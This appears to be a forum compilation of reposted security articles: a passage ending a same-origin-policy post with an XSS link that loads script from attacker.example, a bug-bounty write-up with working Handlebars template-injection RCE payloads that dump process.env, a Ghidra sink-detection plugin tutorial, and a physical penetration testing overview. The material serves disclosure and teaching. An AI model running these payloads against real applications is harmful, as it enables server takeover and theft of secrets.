into visiting the following link http://localhost/vulnerable.html?search=<script%20src%3d"%2f%2fattacker.example%2fevil.js"><%2fscript> The vulnerable page will reflect the search parameter and in this way load a script from http://attacker.example/evil.js. The JavaScript will execute in the context of the page, localhost, as if it has been hosted on the site. Any requests made by it will come from origin http://localhost. Imagine there is a sensitive administrative panel on the same host, port 8080, which is not accessible from the public network, and does not allow cross-origin requests. If the developer who’s fallen victim to the reflected XSS is using Internet Explorer or Edge, then evil.js from attacker.example will have full access to the panel. In particular: if the developer is not logged in to the admin panel: it may attempt to brute force accounts on the administrative panel if the developer is logged in to the admin panel: it can get any data from it or take any action at the level of privilege of the developer I leave it to the reader to reach their conclusion. Mine would be “do not use IE or Edge”. Tools used My (not so) simple (anymore) HTTP server, based on Python’s simple HTTP server https://github.com/aayla-secura/mixnmatchttp/tree/master/demos/ https://pypi.org/project/mixnmatchttp/ VMware Fusion, for running all of the browsers https://www.vmware.com/products/fusion.html Official Microsoft virtual machines https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ References OWASP’s CSRF prevention cheatsheet https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet The Web Origin Concept https://tools.ietf.org/html/rfc6454 The Cross-origin resource sharing (CORS) standard https://www.w3.org/TR/cors/ The HTTP standard https://tools.ietf.org/html/rfc7231#section-4.2.1 Simple HTTP requests https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#Simple_requests If however it is a hostname, the browser doesn’t make sure it resolves to the same IP address during different requests; see DNS Rebinding attack ↩ Even if fakebook.example prevents this using X-Frame-Options, the GET request is already sent ↩ iframe and object don’t support CORS, so the browser should always refuse access, even if the server would allow a GET for this resource. ↩ ↩2 Written by Alex Nikolova (@AaylaSecura1138) Security Consultant at Aura Information Security. Sursa: https://research.aurainfosec.io/same-origin-policy/
-
Handlebars template injection and RCE in a Shopify app April 04, 2019 TL;DR We found a zero-day within a JavaScript template library called handlebars and used it to get Remote Code Execution in the Shopify Return Magic app. The Story: In October 2018, Shopify organized the HackerOne event "H1-514" to which some specific researchers were invited and I was one of them. Some of the Shopify apps that were in scope included an application called "Return Magic" that would automate the whole return process when a customer wants to return a product that they already purchased through a Shopify store. Looking at the application, I found that it has a feature called Email WorkFlow where shop owners can customize the email message sent to users once they return a product. Users could use variables in their template such as {{order.number}} , {{email}} ..etc. I decided to test this feature for Server Side Template injection and entered {{this}} {{self}} then sent a test email to myself and the email had [object Object] within it which immediately attracted my attention. So I spent a lot of time trying to find out what the template engine was, I searched for popular NodeJs templates and thought the template engine was mustache (wrong), I kept looking for mustache template injection online but nothing came up as Mustache is supposed to be a logicless template engine with no ability to call functions which made no sense as I was able to call some Object attributes such as {{this.__proto__}} and even call functions such as {{this.constructor.constructor}} which is the Function constructor. I kept trying to send parameters to this.constructor.constructor() but failed. I decided that this was not vulnerable and moved on to look for more bugs. Then the fate decides that this bug needs to be found and I see a message from Shopify on the event slack channel asking researchers to submit their "almost bugs" so if someone found something and feels it's exploitable, they would send the bug to Shopify security team and if the team manages to exploit it the reporter will get paid as if they found it. Immediately I sent my submission explaining what I have found and at the impact section I wrote "Could be a Server Side template injection that can be used to take over the server ¯\_(ツ)_/¯". Two months passed and I got no response from Shopify regarding my "almost bug" submission, then I was invited to another hacking event in Bali hosted by Synack. There I met the Synack Red Team and after the Synack event has ended, I was supposed to travel back to Egypt, but only 3 hours before the flight I decided to extended my stay for three more days then fly from Bali to Japan where I was supposed to participate in the TrendMicro CTF competition with my CTF team. Some of the SRT also decided to extend their stay in Bali. One of those was Matias so I contacted him to hangout together. After swimming in the ocean and enjoying the beautiful nature of Bali, we went to a restaurant for dinner where Matias told me about a bug he found in a bug bounty program that had something to do with JavaScript sandbox escape so we spent all night missing with objects and constructors, but unfortunately we couldn't escape the sandbox. I couldn't take constructors out of my head and I remembered the template injection bug I found in Shopify. I looked at the HackerOne report and thought that the template can't be mustache so I installed mustache locally and when I parsed {{this}} with mustache it actually returns nothing which is not the case with the Shopify application. I searched again for popular NodeJs template engines and I found a bunch of them, I looked for those that used curly brackets {{ }} for template expressions and downloaded them locally, one of the libraries was handlebars and when I parsed {{this}} it returned [object Object] which is the same as the Shopify app. I looked at handlebars documentation and found out that it's also supposed to not have much logic to prevent template injection attacks. But knowing that I can access the function constructor I decided to give it a try and see how I can pass parameters to functions. After reading the documentation, I found out that in handlebars developers can register functions as helpers in the template scope. We can pass parameters to helpers like this {{helper "param1" "param2" ...params}}. So the first thing I tried was {{this.constructor.constructor "console.log(process.pid)"}} but it just returned console.log(process.pid) as a string. I went to the source code to find out what was happening. At the runtime.js file, there was the following function: lambda: function(current, context) { return typeof current === 'function' ? current.call(context) : current; } So what this function does is that it checks if the current object is of type 'function' and if so it just calls it using current.call(context) where context is the template scope, otherwise, it would just return the object itself. I looked further in the documentation of handlebars and found out that it had built in helpers such as "with", "blockHelperMissing", "forEach" ...etc After reading the source code for each helper, I had an exploitation in mind using the "with" helper as it is used to shift the context for a section of a template by using the built-in with block helper. So I would be able to perform curren.call(context) on my own context. So I tried the following: {{#with "console.log(process.pid)"}} {{#this.constructor.constructor}} {{#this}} {{/this}} {{/this.constructor.constructor}} {{/with}} Basically that should pass console.log(process.pid) as the current context, then when the handlebars compiler reaches this.constructor.constructor and finds that it's a function, it should call it with the current context as the function argument. Then using {{#with this}} we call the returned function from the Function constructor and console.log(process.pid) gets executed. However, this did not work because function.call() is used to invoke a method with an owner object as an argument, so the first argument is the owner object and other arguments are the parameters sent to the function being called. So if the function was called like current.call(this, context), the previous payload would have worked. I spent two more nights in Ubud then flew to Tokyo for the TrendMicro CTF. Again in Tokyo, I couldn't take objects and constructors out of my mind and kept trying to find a way to escape the sandbox. I had another idea of using Array.map() to call Function constructor on my context, but it didn't work because the compiler always passes an extra argument to any function I call which is an object containing the template scope which causes an error as my payload is considered a function argument not the function body. {{#with 1 as |int|}} {{#blockHelperMissing int as |array|}} // This line will create an array and then we can access its constructor {{#with (array.constructor "console.log(process.pid)")}} {{this.pop}} // pop unnecessary parameter pushed by the compiler {{array.map this.constructor.constructor array}} {{/with}} {{/blockHelperMissing}} {{/with}} There seemed to be many possible ways to escape the sandbox but I had one big problem facing me which is that whenever a function is called within the template, the template compiler sends the template scope Object as the last parameter. For example, if I try to call something like constructor.constructor("test","test"), the compiler will call it like constructor.constructor("test", "test", this) and since this will be converted to a string by calling Object.toString() and the anonymous function created will be: function anonymous(test,test){ [object Object] } which will cause an error. I tried many other things but still no luck, then I decided to open the JavaScript documentation for Object prototype and look for something that could help escape the sandbox. I found out that I could overwrite the Object.prototype.toString() function using Object.prototype.defineProperty() so that it calls a function that returns a user controlled string (my payload). Since I can't define functions using the template, all I have to do is to find a function that is already defined within the template scope and returns a user controlled input. For example, the following nodejs application should be vulnerable: test.js var handlebars = require('handlebars'), fs = require('fs'); var storeName = "console.log(process.pid)" // this should be a user-controlled string function getStoreName(){ return storeName; } var scope = { getStoreName: getStoreName } fs.readFile('example.html', 'utf-8', function(error, source){ var template = handlebars.compile(source); var html = template(data); console.log(html) }); example.html {{#with this as |test|}} // with is a helper that sets whichever assigned to it as the context, we name our context test. {{#with (test.constructor.getOwnPropertyDescriptor this "getStoreName")}} // get the context resulted from the evaluated function, in this case, the descriptor of this.getStoreName where this is the template scope defined in data variable in test.js {{#with (test.constructor.defineProperty test.constructor.prototype "toString" this)}} // overwrite Object.prototype.toString with "getStoreName()" defined in test.js {{#with (test.constructor.constructor "test")}} {{/with}} // call the Function constructor. {{/with}} {{/with}} {{/with}} Now if you run this template, console.log(process.pid) gets executed. $ node test.js 1337 I reported that to Shopify and mentioned that if there was a function within the scope that returns a user controlled string, it would have been possible to get RCE. Later, when I met Ibrahim (@the_st0rm) I told him about my idea and he told me that I can use bind() to create a new function that when called will return my RCE payload. From JavaScript documentation: The bind() method creates a new function that, when called, has its this keyword set to the provided value, with a given sequence of arguments preceding any provided when the new function is called. So now the idea is to create a string with whichever code I want to execute then bind its toString() to a function using bind() after that overwrite the Object.prototype.toString() function with that function. I spent a lot of time trying to apply this using handlebars templates, and eventually during my flight back to Egypt I was able to get a fully working PoC with no need to use functions defined in the template scope. {{#with this as |obj|}} {{#with (obj.constructor.keys "1") as |arr|}} {{arr.pop}} {{arr.push obj.constructor.name.constructor.bind}} {{arr.pop}} {{arr.push "console.log(process.env)"}} {{arr.pop}} {{#blockHelperMissing obj.constructor.name.constructor.bind}} {{#with (arr.constructor (obj.constructor.name.constructor.bind.apply obj.constructor.name.constructor arr))}} {{#with (obj.constructor.getOwnPropertyDescriptor this 0)}} {{#with (obj.constructor.defineProperty obj.constructor.prototype "toString" this)}} {{#with (obj.constructor.constructor "test")}} {{/with}} {{/with}} {{/with}} {{/with}} {{/blockHelperMissing}} {{/with}} {{/with}} Basically, what the template above does is: x = '' myToString = x.constructor.bind.apply(x.constructor, [x.constructor.bind,"console.log(process.pid)"]) myToStringArr = Array(myToString) myToStringDescriptor = Object.getOwnPropertyDescriptor(myToStringArr, 0) Object.defineProperty(Object.prototype, "toString", myToStringDescriptor) Object.constructor("test", this)() And when I tried it with Shopify, I got: Matias also texted me with an exploitation that he got which is much simpler than the one I used: {{#with "s" as |string|}} {{#with "e"}} {{#with split as |conslist|}} {{this.pop}} {{this.push (lookup string.sub "constructor")}} {{this.pop}} {{#with string.split as |codelist|}} {{this.pop}} {{this.push "return JSON.stringify(process.env);"}} {{this.pop}} {{#each conslist}} {{#with (string.sub.apply 0 codelist)}} {{this}} {{/with}} {{/each}} {{/with}} {{/with}} {{/with}} {{/with}} With that said, I was able to get RCE on Shopify's Return Magic application as well as some other websites that used handlebars as a template engine. The vulnerability was also submitted to npm security and handlebars pushed a fix that disables access to constructors. The advisory can be found here: https://www.npmjs.com/advisories/755 In a nutshell You can use the following to inject Handlebars templates: {{#with this as |obj|}} {{#with (obj.constructor.keys "1") as |arr|}} {{arr.pop}} {{arr.push obj.constructor.name.constructor.bind}} {{arr.pop}} {{arr.push "return JSON.stringify(process.env);"}} {{arr.pop}} {{#blockHelperMissing obj.constructor.name.constructor.bind}} {{#with (arr.constructor (obj.constructor.name.constructor.bind.apply obj.constructor.name.constructor arr))}} {{#with (obj.constructor.getOwnPropertyDescriptor this 0)}} {{#with (obj.constructor.defineProperty obj.constructor.prototype "toString" this)}} {{#with (obj.constructor.constructor "test")}} {{this}} {{/with}} {{/with}} {{/with}} {{/with}} {{/blockHelperMissing}} {{/with}} {{/with}} Matias also had his own exploitation that is much simpler: {{#with "s" as |string|}} {{#with "e"}} {{#with split as |conslist|}} {{this.pop}} {{this.push (lookup string.sub "constructor")}} {{this.pop}} {{#with string.split as |codelist|}} {{this.pop}} {{this.push "return JSON.stringify(process.env);"}} {{this.pop}} {{#each conslist}} {{#with (string.sub.apply 0 codelist)}} {{this}} {{/with}} {{/each}} {{/with}} {{/with}} {{/with}} {{/with}} Sorry for the long post, if you have any questions please drop me a tweet @Zombiehelp54 Sursa: https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html
-
Ghidra Plugin Development for Vulnerability Research - Part-1 Overview On March 5th at the RSA security conference, the National Security Agency (NSA) released a reverse engineering tool called Ghidra. Similar to IDA Pro, Ghidra is a disassembler and decompiler with many powerful features (e.g., plugin support, graph views, cross references, syntax highlighting, etc.). Although Ghidra's plugin capabilities are powerful, there is little information published on its full capabilities. This blog post series will focus on Ghidra’s plugin development and how it can be used to help identify software vulnerabilities. In our previous post, we leveraged IDA Pro’s plugin functionality to identify sinks (potentially vulnerable functions or programming syntax). We then improved upon this technique in our follow up blog post to identify inline strcpy calls and identified a buffer overflow in Microsoft Office. In this post, we will use similar techniques with Ghidra’s plugin feature to identify sinks in CoreFTPServer v1.2 build 505. Ghidra Plugin Fundamentals Before we begin, we recommend going through the example Ghidra plugin scripts and the front page of the API documentation to understand the basics of writing a plugin. (Help -> Ghidra API Help) When a Ghidra plugin script runs, the current state of the program will be handled by the following five objects: currentProgram: the active program currentAddress: the address of the current cursor location in the tool currentLocation: the program location of the current cursor location in the tool, or null if no program location exists currentSelection: the current selection in the tool, or null if no selection exists currentHighlight: the current highlight in the tool, or null if no highlight exists It is important to note that Ghidra is written in Java, and its plugins can be written in Java or Jython. For the purposes of this post, we will be writing a plugin in Jython. There are three ways to use Ghidra’s Jython API: Using Python IDE (similar to IDA Python console): Loading a script from the script manager: Headless - Using Ghidra without a GUI: With an understanding of Ghidra plugin basics, we can now dive deeper into the source code by utilizing the script manager (Right Click on the script -> Edit with Basic Editor) The example plugin scripts are located under /path_to_ghidra/Ghidra/Features/Python/ghidra_scripts. (In the script manager, these are located under Examples/Python/😞 Ghidra Plugin Sink Detection In order to detect sinks, we first have to create a list of sinks that can be utilized by our plugin. For the purpose of this post, we will target the sinks that are known to produce buffer overflow vulnerabilities. These sinks can be found in various write-ups, books, and publications. Our plugin will first identify all function calls in a program and check against our list of sinks to filter out the targets. For each sink, we will identify all of their parent functions and called addresses. By the end of this process, we will have a plugin that can map the calling functions to sinks, and therefore identify sinks that could result in a buffer overflow. Locating Function Calls There are various methods to determine whether a program contains sinks. We will be focusing on the below methods, and will discuss each in detail in the following sections: Linear Search - Iterate over the text section (executable section) of the binary and check the instruction operand against our predefined list of sinks. Cross References (Xrefs) - Utilize Ghidra’s built in identification of cross references and query the cross references to sinks. Linear Search The first method of locating all function calls in a program is to do a sequential search. While this method may not be the ideal search technique, it is a great way of demonstrating some of the features in Ghidra’s API. Using the below code, we can print out all instructions in our program: listing = currentProgram.getListing() #get a Listing interface ins_list = listing.getInstructions(1) #get an Instruction iterator while ins_list.hasNext(): #go through each instruction and print it out to the console ins = ins_list.next() print (ins) Running the above script on CoreFTPServer gives us the following output: We can see that all of the x86 instructions in the program were printed out to the console. Next, we filter for sinks that are utilized in the program. It is important to check for duplicates as there could be multiple references to the identified sinks. Building upon the previous code, we now have the following: sinks = [ "strcpy", "memcpy", "gets", "memmove", "scanf", "lstrcpy", "strcpyW", #... ] duplicate = [] listing = currentProgram.getListing() ins_list = listing.getInstructions(1) while ins_list.hasNext(): ins = ins_list.next() ops = ins.getOpObjects(0) try: target_addr = ops[0] sink_func = listing.getFunctionAt(target_addr) sink_func_name = sink_func.getName() if sink_func_name in sinks and sink_func_name not in duplicate: duplicate.append(sink_func_name) print (sink_func_name,target_addr) except: pass Now that we have identified a list of sinks in our target binary, we have to locate where these functions are getting called. Since we are iterating through the executable section of the binary and checking every operand against the list of sinks, all we have to do is add a filter for the call instruction. Adding this check to the previous code gives us the following: sinks = [ "strcpy", "memcpy", "gets", "memmove", "scanf", "strcpyA", "strcpyW", "wcscpy", "_tcscpy", "_mbscpy", "StrCpy", "StrCpyA", "lstrcpyA", "lstrcpy", #... ] duplicate = [] listing = currentProgram.getListing() ins_list = listing.getInstructions(1) #iterate through each instruction while ins_list.hasNext(): ins = ins_list.next() ops = ins.getOpObjects(0) mnemonic = ins.getMnemonicString() #check to see if the instruction is a call instruction if mnemonic == "CALL": try: target_addr = ops[0] sink_func = listing.getFunctionAt(target_addr) sink_func_name = sink_func.getName() #check to see if function being called is in the sinks list if sink_func_name in sinks and sink_func_name not in duplicate: duplicate.append(sink_func_name) print (sink_func_name,target_addr) except: pass Running the above script against CoreFTPServer v1.2 build 505 shows the results for all detected sinks: Unfortunately, the above code does not detect any sinks in the CoreFTPServer binary. However, we know that this particular version of CoreFTPServer is vulnerable to a buffer overflow and contains the lstrcpyA sink. So, why did our plugin fail to detect any sinks? After researching this question, we discovered that in order to identify the functions that are calling out to an external DLL, we need to use the function manager that specifically handles the external functions. To do this, we modified our code so that every time we see a call instruction we go through all external functions in our program and check them against the list of sinks. Then, if they are found in the list, we verify whether that the operand matches the address of the sink. The following is the modified section of the script: sinks = [ "strcpy", "memcpy", "gets", "memmove", "scanf", "strcpyA", "strcpyW", "wcscpy", "_tcscpy", "_mbscpy", "StrCpy", "StrCpyA", "lstrcpyA", "lstrcpy", #... ] program_sinks = {} listing = currentProgram.getListing() ins_list = listing.getInstructions(1) ext_fm = fm.getExternalFunctions() #iterate through each of the external functions to build a dictionary #of external functions and their addresses while ext_fm.hasNext(): ext_func = ext_fm.next() target_func = ext_func.getName() #if the function is a sink then add it's address to a dictionary if target_func in sinks: loc = ext_func.getExternalLocation() sink_addr = loc.getAddress() sink_func_name = loc.getLabel() program_sinks[sink_addr] = sink_func_name #iterate through each instruction while ins_list.hasNext(): ins = ins_list.next() ops = ins.getOpObjects(0) mnemonic = ins.getMnemonicString() #check to see if the instruction is a call instruction if mnemonic == "CALL": try: #get address of operand target_addr = ops[0] #check to see if address exists in generated sink dictionary if program.sinks.get(target_addr): print (program_sinks[target_addr], target_addr,ins.getAddress()) except: pass Running the modified script against our program shows that we identified multiple sinks that could result in a buffer overflow. Xrefs The second and more efficient approach is to identify cross references to each sink and check which cross references are calling the sinks in our list. Because this approach does not search through the entire text section, it is more efficient. Using the below code, we can identify cross references to each sink: sinks = [ "strcpy", "memcpy", "gets", "memmove", "scanf", "strcpyA", "strcpyW", "wcscpy", "_tcscpy", "_mbscpy", "StrCpy", "StrCpyA", "lstrcpyA", "lstrcpy", #... ] duplicate = [] func = getFirstFunction() while func is not None: func_name = func.getName() #check if function name is in sinks list if func_name in sinks and func_name not in duplicate: duplicate.append(func_name) entry_point = func.getEntryPoint() references = getReferencesTo(entry_point) #print cross-references print(references) #set the function to the next function func = getFunctionAfter(func) Now that we have identified the cross references, we can get an instruction for each reference and add a filter for the call instruction. A final modification is added to include the use of the external function manager: sinks = [ "strcpy", "memcpy", "gets", "memmove", "scanf", "strcpyA", "strcpyW", "wcscpy", "_tcscpy", "_mbscpy", "StrCpy", "StrCpyA", "lstrcpyA", "lstrcpy", #... ] duplicate = [] fm = currentProgram.getFunctionManager() ext_fm = fm.getExternalFunctions() #iterate through each external function while ext_fm.hasNext(): ext_func = ext_fm.next() target_func = ext_func.getName() #check if the function is in our sinks list if target_func in sinks and target_func not in duplicate: duplicate.append(target_func) loc = ext_func.getExternalLocation() sink_func_addr = loc.getAddress() if sink_func_addr is None: sink_func_addr = ext_func.getEntryPoint() if sink_func_addr is not None: references = getReferencesTo(sink_func_addr) #iterate through all cross references to potential sink for ref in references: call_addr = ref.getFromAddress() ins = listing.getInstructionAt(call_addr) mnemonic = ins.getMnemonicString() #print the sink and address of the sink if #the instruction is a call instruction if mnemonic == “CALL”: print (target_func,sink_func_addr,call_addr) Running the modified script against CoreFTPServer gives us a list of sinks that could result in a buffer overflow: Mapping Calling Functions to Sinks So far, our Ghidra plugin can identify sinks. With this information, we can take it a step further by mapping the calling functions to the sinks. This allows security researchers to visualize the relationship between the sink and its incoming data. For the purpose of this post, we will use graphviz module to draw a graph. Putting it all together gives us the following code: from ghidra.program.model.address import Address from ghidra.program.model.listing.CodeUnit import * from ghidra.program.model.listing.Listing import * import sys import os #get ghidra root directory ghidra_default_dir = os.getcwd() #get ghidra jython directory jython_dir = os.path.join(ghidra_default_dir, "Ghidra", "Features", "Python", "lib", "Lib", "site-packages") #insert jython directory into system path sys.path.insert(0,jython_dir) from beautifultable import BeautifulTable from graphviz import Digraph sinks = [ "strcpy", "memcpy", "gets", "memmove", "scanf", "strcpyA", "strcpyW", "wcscpy", "_tcscpy", "_mbscpy", "StrCpy", "StrCpyA", "StrCpyW", "lstrcpy", "lstrcpyA", "lstrcpyW", #... ] sink_dic = {} duplicate = [] listing = currentProgram.getListing() ins_list = listing.getInstructions(1) #iterate over each instruction while ins_list.hasNext(): ins = ins_list.next() mnemonic = ins.getMnemonicString() ops = ins.getOpObjects(0) if mnemonic == "CALL": try: target_addr = ops[0] func_name = None if isinstance(target_addr,Address): code_unit = listing.getCodeUnitAt(target_addr) if code_unit is not None: ref = code_unit.getExternalReference(0) if ref is not None: func_name = ref.getLabel() else: func = listing.getFunctionAt(target_addr) func_name = func.getName() #check if function name is in our sinks list if func_name in sinks and func_name not in duplicate: duplicate.append(func_name) references = getReferencesTo(target_addr) for ref in references: call_addr = ref.getFromAddress() sink_addr = ops[0] parent_func_name = getFunctionBefore(call_addr).getName() #check sink dictionary for parent function name if sink_dic.get(parent_func_name): if sink_dic[parent_func_name].get(func_name): if call_addr not in sink_dic[parent_func_name][func_name]['call_address']: sink_dic[parent_func_name][func_name]['call_address'].append(call_addr) else: sink_dic[parent_func_name] = {func_name:{"address":sink_addr,"call_address":[call_addr]}} else: sink_dic[parent_func_name] = {func_name:{"address":sink_addr,"call_address":[call_addr]}} except: pass #instantiate graphiz graph = Digraph("ReferenceTree") graph.graph_attr['rankdir'] = 'LR' duplicate = 0 #Add sinks and parent functions to a graph for parent_func_name,sink_func_list in sink_dic.items(): #parent functions will be blue graph.node(parent_func_name,parent_func_name, style="filled",color="blue",fontcolor="white") for sink_name,sink_list in sink_func_list.items(): #sinks will be colored red graph.node(sink_name,sink_name,style="filled", color="red",fontcolor="white") for call_addr in sink_list['call_address']: if duplicate != call_addr: graph.edge(parent_func_name,sink_name, label=call_addr.toString()) duplicate = call_addr ghidra_default_path = os.getcwd() graph_output_file = os.path.join(ghidra_default_path, "sink_and_caller.gv") #create the graph and view it using graphiz graph.render(graph_output_file,view=True) Running the script against our program shows the following graph: We can see the calling functions are highlighted in blue and the sink is highlighted in red. The addresses of the calling functions are displayed on the line pointing to the sink. After conducting some manual analysis we were able to verify that several of the sinks identified by our Ghidra plugin produced a buffer overflow. The following screenshot of WinDBG shows that EIP is overwritten by 0x42424242 as a result of an lstrcpyA function call. Additional Features Although visualizing the result in a graph format is helpful for vulnerability analysis, it would also be useful if the user could choose different output formats. The Ghidra API provides several methods for interacting with a user and several ways of outputting data. We can leverage the Ghidra API to allow a user to choose an output format (e.g. text, JSON, graph) and display the result in the chosen format. The example below shows the dropdown menu with three different display formats. The full script is available at our github: Limitations There are multiple known issues with Ghidra, and one of the biggest issues for writing an analysis plugin like ours is that the Ghidra API does not always return the correct address of an identified standard function. Unlike IDA Pro, which has a database of function signatures (FLIRT signatures) from multiple libraries that can be used to detect the standard function calls, Ghidra only comes with a few export files (similar to signature files) for DLLs. Occasionally, the standard library detection will fail. By comparing IDA Pro and Ghidra’s disassembly output of CoreFTPServer, we can see that IDA Pro’s analysis successfully identified and mapped the function lstrcpyA using a FLIRT signature, whereas Ghidra shows a call to the memory address of the function lstrcpyA. Although the public release of Ghidra has limitations, we expect to see improvements that will enhance the standard library analysis and aid in automated vulnerability research. Conclusion Ghidra is a powerful reverse engineering tool that can be leveraged to identify potential vulnerabilities. Using Ghidra’s API, we were able to develop a plugin that identifies sinks and their parent functions and display the results in various formats. In our next blog post, we will conduct additional automated analysis using Ghidra and enhance the plugins vulnerability detection capabilities. Posted on April 5, 2019 by Somerset Recon and tagged Ghidra Reverse Engineering Plugin Vulnerability Analysis. Sursa: https://www.somersetrecon.com/blog/2019/ghidra-plugin-development-for-vulnerability-research-part-1
-
How to Perform Physical Penetration Testing Guest Contributor: Chiheb Chebbi Abstract None can deny that physical security is playing a huge role and a necessary aspect of “Information Security” in general. This article will guide us through many important terminologies in physical security and show us how to perform Physical Penetration Testing. In this Article we are going to discover: Information security and Physical security: The Link Physical Security Overview Physical Penetration Testing Crime prevention through environmental design (CPTED) After reading this article you can use this document that contains many useful resources to help you learn more about Physical Security and physical penetration testing: Physical Security Information security and Physical security: The Link Before diving deep into exploring physical security, some points are needed to be discussed to avoid any confusion. Many information security new learners go with the assumption that the main role of information security professionals is securing computers, servers, and devices in general but they neglect the fact that the role of information security professional is to secure “Information” and information can be stored using different means including Papers, paper mail, bills, notebooks and so on. Also many don’t know that the most valuable asset in an organization is not a technical device and even it is not a multi-million datacenter but it is “The Human”. Yes! In Risk management, risks against Human should be mitigated first urgently. Thus, securing the physical environment is included in the tasks of Risk Managers and CISO’s (if I am mistaken please correct me) For more information, I highly recommend you to check this great paper from SANS Institut: Physical Security and Why It Is Important – SANS Institute Physical Security Overview By definition “Physical security is the protection of personnel, hardware, software, networks and data from physical actions and events that could cause serious loss or damage to an enterprise, agency or institution. This includes protection from fire, flood, natural disasters, burglary, theft, vandalism, and terrorism.” [https://searchsecurity.techtarget.com ] Physical security has three important components: Access control Surveillance Testing As you can see from the definition your job also is to secure the enterprise from natural disasters and physical accidents. Physical Threats The International Information System Security Certification Consortium, or (ISC)² describes the role of information security professionals in CISSP Study Guide (by Eric Conrad, Seth Misenar and Joshua Feldman) as the following: “Our job as information security professionals is to evaluate risks against our critical assets and deploy safeguards to mitigate those risks. We work in various roles: firewall engineers, penetration testers, auditors, management, etc. The common thread is risk: it is part of our job description.” Risks can be presented in a mathematical way using the following formula: Risk = Threat x Vulnerability (Sometimes we add another parameter called “Impact” but for now let’s just focus on Threats and vulnerabilities.) In your daily basis job you will face many Threats. (To avoid confusion between the Three terms Threat, Vulnerability, and Risk check the first section of this article How to build a Threat Hunting platform using ELK Stack) Some Physical Threats are the following: Natural Environmental threats: Disasters Floods Earthquakes Volcanoes Tsunamis Avalanches Politically motivated threats Supply and Transportation Threats Security Defenses To defend against physical Threats, you need to implement and deploy the right safeguards. For example, you can use a Defense in-depth approach. The major Physical safeguards are the following: Video Surveillance Fences Security Guards Lacks and Smart Locks Biometric Access Controls Different and well-chosen Windows Mitigating Power Loss and Excessing Guard dogs Lights Signs Man-traps Different Fire Suppressions and protection systems (Soda Acid, Water, Gas Halon): The Fire extinguishers should be chosen based on the class of fire: Class A – fires involving solid materials such as wood, paper or textiles. Class B – fires involving flammable liquids such as petrol, diesel or oils. Class C – fires involving gases. Class D – fires involving metals. Class E – fires involving live electrical apparatus. (Technically ‘Class E’ doesn’t exists, however, this is used for convenience here) Class F – fires involving cooking oils such as in deep-fat fryers. You can check the different fire extinguishers using this useful link: https://www.marsden-fire-safety.co.uk/resources/fire-extinguishers Access Control Access controls is vital when it comes to physical security. So I want to take this opportunity to talk a little bit about it. As you noticed maybe, many information security aspects are taking and inspired from the military (Teaming names: Red Team, Blue Team and so on). Also, Access control is inspired from the military. To represent security policies in a logical way we use what we call Security models mechanisms. These models are inspired from the Trusted Computing Base (TCB), which is described in the US Department of Defense Standard 5200.28. This standard is also known as the Orange Book. These are the most well know security models: Bell-LaPadula Model Biba Model Clark-Wilson Model To learn more about the Security model read this Document: https://media.techtarget.com/searchSecurity/downloads/29667C05.pdf Access controls are a form of technical security controls (a control as a noun means an entity that checks based on a standard). We have three Access Control categories Mandatory Access Control (MAC): The system checks the identity of a subject and its permissions with the object permissions. So usually, both subjects and objects have labels using a ranking system (top secret, confidential, and so on). Discretionary Access Control (DAC): The object owner is allowed to set permissions to users. Passwords are a form of DAC. Role-Based Access Control (RBAC): As its name indicates, the access is based on assigned roles. Physical Penetration Testing By now we acquired a fair understanding about many important aspects of physical security. Let’s move to another point which is how to perform a Physical Penetration testing. By definition: “A penetration test, or pen–test, is an attempt to evaluate the security of an IT infrastructure by safely trying to exploit vulnerabilities. These vulnerabilities may exist in operating systems, services and application flaws, improper configurations or risky end-user behavior.” [ www.coresecurity.com ] When it comes to penetration testing we have three types: White box pentesting: The pentester knows everything about the target including physical environment information, employees, IP addresses, Host and server information and so on (of course in the agreed scope) Black box pentesting: in this case, the pentester don’t know anything about the target Gray box pentesting: is the mix between the two types Usually, Penetration Testers use a Pentesting standard to follow when performing a penetration testing mission. Standards are a low-level description of how the organization will enforce the policy. In other words, they are used to maintain a minimum level of effective cybersecurity. To learn the difference between: Standard, Policy, procedure and guideline check this useful link : https://frsecure.com/blog/differentiating-between-policies-standards-procedures-and-guidelines/ As a penetration tester you can use from a great number of pentesting standards like: The Open Source Security Testing Methodology Manual (OSSTMM) The Information Systems Security Assessment Framework (ISSAF) The Penetration Testing Execution Standard (PTES) The Payment Card Industry Data Security Standard (PCI DSS) If you selected The Penetration Testing Execution Standard (PTES) for example (https://media.readthedocs.org/pdf/pentest-standard/latest/pentest-standard.pdf ) You need to follow the following steps and phases: Pre-engagement Interactions Intelligence Gathering Threat Modeling Vulnerability Analysis Exploitation Post Exploitation Reporting (Just click on any step to learn more about it) The Team You can’t perform a successful physical penetration testing mission without a great Team. Wil Allsopp in his great book Unauthorised Access Physical Penetration Testing For IT Security Teams gave a great operation team suggestion. He believes that every good physical penetration testing team should contain: Operator Team Leader Coordinator or Planner Social Engineer Computer Intrusion Specialist Physical Security Specialist Surveillance Specialist He also gave a great workflow so you can use it in your mission: Peerlyst is also loaded with great physical security Articles. The following are some of them: Most Locks are stupid easy to pick How to become a Hardware Security Specialist Hardware/Software vendor playbook: Handling vulnerabilities found in your products after launch The hardware security and firmware security wiki Becoming a Penetration Tester – Hardware Hacking Part 1 Best practices for securing hardware devices against physical intrusion [TOOL] Umbrella App: Digital and Physical Security Lessons and Advice in Your Pocket! Physical Security Blog. Part 1: Why the Physical Security Industry is Dysfunctional Physical Security: The Missing Piece From Your Cyber Security Puzzle Physical Security = Information Security, both have almost identical requirements How to get started with physical security How Physical security fails:2 Tales from a Sneaker Crime prevention through environmental design (CPTED) Crime prevention through environmental design (CPTED) is a set of design principles used to discourage crime. The concept is simple: Buildings and properties are designed to prevent damage from the force of the elements and natural disasters; they should also be designed to prevent crime. [William Deutsch] There are mainly 4 major principles: Natural Surveillance: Criminals will do everything to stay undetected so we need to keep them under observation by keeping many areas bright and by trying to eliminate hiding spots. Natural Access Control: relies on doors, fences, shrubs, and other physical elements to keep unauthorized persons out of a particular place if they do not have a legitimate reason for being there. Territorial Reinforcement: is done by giving spatial definitions such as the subdivision of space into different degrees of public/semi-public/ private areas Maintenance: the property should be well -maintained You can find the full Crime prevention through environmental design Guide in the references section below. Summary In this article we explored many aspects of physical security. We started by learning the relationship between Physical security and information security. Later we dived deep into many terminologies in physical security. Then, we discovered how to perform a physical penetration testing and the required team to do that successfully. Finally, we finished the article by giving a small glimpse about Crime prevention 